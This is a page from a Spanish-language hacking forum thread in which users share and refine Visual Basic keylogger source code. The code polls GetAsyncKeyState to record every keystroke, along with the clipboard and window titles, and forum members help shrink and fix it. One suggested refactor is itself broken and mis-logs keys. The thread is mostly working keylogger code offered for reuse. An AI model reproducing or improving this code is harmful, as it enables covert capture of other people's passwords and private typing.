elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Keylogger vuelto lokoOo!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 Ir Abajo Respuesta Imprimir
Autor Tema: Keylogger vuelto lokoOo!  (Leído 6,968 veces)
A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: Keylogger vuelto lokoOo!
« Respuesta #10 en: 19 Septiembre 2005, 17:14 pm »

Jajaja, muchas gracias por sus codigoOos!...
pero en realidad como voy empezando con la programacion no supe como usar el select case xD.
Lo que mejor hize fue kitar ciertos karacteres que no me servirian de nada por ejemplo "º" "ª" etc... xDDDD.
y se redujo un poko el codigoOo...
Aki se los dejo por si les ayuda en algo...
Si alguien lo kiere reducir mas, k me lo mande!!!!! xDDDD

Código:
Private Sub Timer1_Timer()
On Error Resume Next

Call ReadClipBoard

For i = Asc("A") To Asc("Z")
 If GetAsyncKeyState(i) = -32767 Then
 TypeWindow
  If GetAsyncKeyState(SHIFT) < 0 Then
   TypeWindow
   If GetKeyState(CAPITAL) > 0 Then
   Text1 = Text1 & LCase(Chr(i))
   Exit Sub
   Else
   Text1 = Text1 & UCase(Chr(i))
   Exit Sub
   End If
   
  Else
   If GetKeyState(CAPITAL) > 0 Then
   Text1 = Text1 & UCase(Chr(i))
   Exit Sub
   Else
   Text1 = Text1 & LCase(Chr(i))
   Exit Sub
   End If
  End If
 
End If
Next

For i = 48 To 57
 If GetAsyncKeyState(i) = -32767 Then
  If GetAsyncKeyState(SHIFT) < 0 Then
  Text1 = Text1 & Chr2(i)
  Exit Sub
  Else
  Text1 = Text1 & Chr(i)
  Exit Sub
  End If
 End If
Next

For i = 186 To 192
 If GetAsyncKeyState(i) = -32767 Then
  If GetAsyncKeyState(SHIFT) < 0 Then
  Text1 = Text1 & Chr2(i - 100)
  Exit Sub
  Else
  Text1 = Text1 & Chr2(i)
  Exit Sub
  End If
 
 End If
Next

For i = 219 To 222
 If GetAsyncKeyState(i) = -32767 Then
  If GetAsyncKeyState(SHIFT) < 0 Then
  Text1 = Text1 & Chr2(i - 100)
  Exit Sub
  Else
  Text1 = Text1 & Chr2(i)
  Exit Sub
  End If
 End If
Next

For i = 96 To 111
 If GetAsyncKeyState(i) = -32767 Then
  Text1 = Text1 & Chr2(i)
  Exit Sub
 End If
 Next
 
  If GetAsyncKeyState(8) = -32767 Then
 If (Right(Text1, 1) = " ") Then GoTo nod
 tip = Len(Text1) - 1
  Text1 = Left(Text1, tip)
nod:
 End If
 
 If GetAsyncKeyState(9) = -32767 Then
  Text1 = Text1 & "[Tab]"
 End If
 
 If GetAsyncKeyState(13) = -32767 Then
  Text1 = Text1 & "<br>"
 End If

 If GetAsyncKeyState(17) = -32767 Then
  Text1 = Text1 & "[Ctrl]"
 End If
 
 If GetAsyncKeyState(18) = -32767 Then
  Text1 = Text1 & "[Alt]"
 End If
 
 If GetAsyncKeyState(27) = -32767 Then
  Text1 = Text1 & "[Esc]"
 End If
 
 If GetAsyncKeyState(32) = -32767 Then
  Text1 = Text1 & " "
 End If
 
   If GetAsyncKeyState(91) = -32767 Then
  Text1 = Text1 & "[Win]"
 End If
 
 If GetAsyncKeyState(92) = -32767 Then
  Text1 = Text1 & "[Win]"
 End If
 
End Sub
 Function CodigosRaros()
Chr2(49) = "!"
Chr2(50) = "@"
Chr2(52) = "$"
Chr2(55) = "/"
Chr2(56) = "("
Chr2(57) = ")"
Chr2(186) = "`"
Chr2(187) = "+"
Chr2(188) = ","
Chr2(189) = "-"
Chr2(190) = "."
Chr2(219) = "'"
Chr2(221) = "¡"
Chr2(222) = "´"
Chr2(86) = "^"
Chr2(87) = "*"
Chr2(88) = ";"
Chr2(89) = "_"
Chr2(90) = ":"
Chr2(119) = "?"
Chr2(121) = "¿"
Chr2(122) = """"
Chr2(96) = "0"
Chr2(97) = "1"
Chr2(98) = "2"
Chr2(99) = "3"
Chr2(100) = "4"
Chr2(101) = "5"
Chr2(102) = "6"
Chr2(103) = "7"
Chr2(104) = "8"
Chr2(105) = "9"
Chr2(106) = "*"
Chr2(107) = "+"
Chr2(109) = "-"
Chr2(110) = "."
Chr2(111) = "/"
Chr2(192) = "ñ"
Chr2(92) = "Ñ"
End Function


En línea

Hackeo, luego existo...
Kizar


Desconectado Desconectado

Mensajes: 1.325


kizar_net


Ver Perfil
Re: Keylogger vuelto lokoOo!
« Respuesta #11 en: 19 Septiembre 2005, 18:38 pm »

Si no me ekivoco seria una cosa asi, aki no tengo el vb mirarlo vosotros:

Código:
Dim i As Long

For i = 48 To 222

Select Case GetAsyncKeyState(i) = -32767

Case 8
If Right(Text1, 1) = " " Then GoTo nod
tip = Len(Text1) - 1
  Text1 = Left(Text1, tip)
nod:

Case 9
 Text1 = Text1 & "[Tab]"
 
Case 13
Text1 = Text1 & "<br>"

Case 17
 Text1 = Text1 & "[Ctrl]"
 
Case 18
 Text1 = Text1 & "[Alt]"

Case 27
 Text1 = Text1 & "[Esc]"

Case 32
Text1 = Text1 & " "
 
Case 91 Or 92
Text1 = Text1 & "[Win]"

Case 48 To 57
If GetAsyncKeyState(SHIFT) < 0 Then
  Text1 = Text1 & Chr2(i)
  Else
  Text1 = Text1 & Chr(i)
End If

Case 186 To 192
  If GetAsyncKeyState(SHIFT) < 0 Then
  Text1 = Text1 & Chr2(i - 100)
  Else
  Text1 = Text1 & Chr2(i)
  End If

Case 219 To 222
  If GetAsyncKeyState(SHIFT) < 0 Then
  Text1 = Text1 & Chr2(i - 100)
  Else
  Text1 = Text1 & Chr2(i)
  End If

Case 96 To 111
  Text1 = Text1 & Chr2(i)

End Select

Next

E puesto solo parte del codigo

Salu2


En línea

A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: Keylogger vuelto lokoOo!
« Respuesta #12 en: 19 Septiembre 2005, 19:01 pm »

muchas gracias... Jajajaja, aunke ahora esta mas loko, escribe "TAB" cuando oprimo "CONTROL" jajajajajajajaja...
Hay un error en el codigo, ahora deja lo analizo para detectarloOo!.

Muchas gracias! ahora ya me diste una idea de como funciona! =) gracias....
En línea

Hackeo, luego existo...
hacksoft

Desconectado Desconectado

Mensajes: 83


Ver Perfil
Re: Keylogger vuelto lokoOo!
« Respuesta #13 en: 28 Septiembre 2005, 01:19 am »

Holas disculpa mi ignorancia, pero quisiera saber que quiere decir que es menor que cero o mayor que cero ?

If GetAsyncKeyState(SHIFT) < 0 Then
   TypeWindow
   If GetKeyState(CAPITAL) > 0 Then
   Text1 = Text1 & LCase(Chr(i))

En esa parte del codigo usas como referencia el cero, si es mayor o menor, no entiendo que tiene que ver el cero.

Y otra curiosidad es que significa    -32767

Gracias.Espero respuestas a mis dudas
En línea

La vida es un Juego. Firma Mario Bros
Slasher-K


Desconectado Desconectado

Mensajes: 1.477


Ver Perfil
Re: Keylogger vuelto lokoOo!
« Respuesta #14 en: 28 Septiembre 2005, 04:15 am »

Son valores que devuelve GetAsyncKeyState, lo único que hace es controlar el valor devuelto.

Saludos.
En línea



A la reina de las profundidades que cuida los pasos de una sombra en la noche :*
elpato_zeta

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: Keylogger vuelto lokoOo!
« Respuesta #15 en: 4 Octubre 2005, 23:12 pm »

si dices que te come las letras si escribes rapido porke no usas el keypress y almacenas la tecla pulsada en una variable ahi por muy rapido que escribas no se le va a pasar la tecla pulsa no se si me esplico si no dime y te pongo un ejemplillo ok bye
En línea

NYlOn


Desconectado Desconectado

Mensajes: 842


OOOOHHHHHH, TARAGÜIIII xDDDDDD


Ver Perfil WWW
Re: Keylogger vuelto lokoOo!
« Respuesta #16 en: 4 Octubre 2005, 23:24 pm »

Hoockea el teclado...
En línea

elpato_zeta

Desconectado Desconectado

Mensajes: 17


Ver Perfil
progressbar
« Respuesta #17 en: 4 Octubre 2005, 23:45 pm »

bueno vi un post de Sk8er_boy12 donde preguntaba sobre como crear un progress bar y creo que no le contestaron bien a su pregunta quise contestarla pero no pude hacerlo ahi en su post (nunca encontre el puto botoncito de responder por eso cree este nuevo tema ahi a ver si lo lee o le sirve a alguien mas te lo dejo a manera de ejemplo por si quieres hacer copy-paste (cambias los comentarios por valores) ;) hojala les sirva
En línea

NYlOn


Desconectado Desconectado

Mensajes: 842


OOOOHHHHHH, TARAGÜIIII xDDDDDD


Ver Perfil WWW
Re: Keylogger vuelto lokoOo!
« Respuesta #18 en: 4 Octubre 2005, 23:48 pm »

Si no podes responder es pq el tema esta cerrado o no estabas logueado...
No tendrias que haber posteado en este thread, de ULTIMA podrias haber creado un tema nuevo...
Y x cierto, no escribiste nada :S
En línea

elpato_zeta

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: Keylogger vuelto lokoOo!
« Respuesta #19 en: 4 Octubre 2005, 23:58 pm »

jaja  ;D no se paso yo estaba creando un  nuevo tema pero me confundi y salio aqui esta pc esta loca tampoco pego lo que yo queria que pegara no salio nada  ??? voy a crear un nuevo tema ya hora si escribo el ejemplo disculpas no estoy familiarizado aun en este foro  es apenas mi segundo post
En línea

Páginas: 1 [2] 3 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines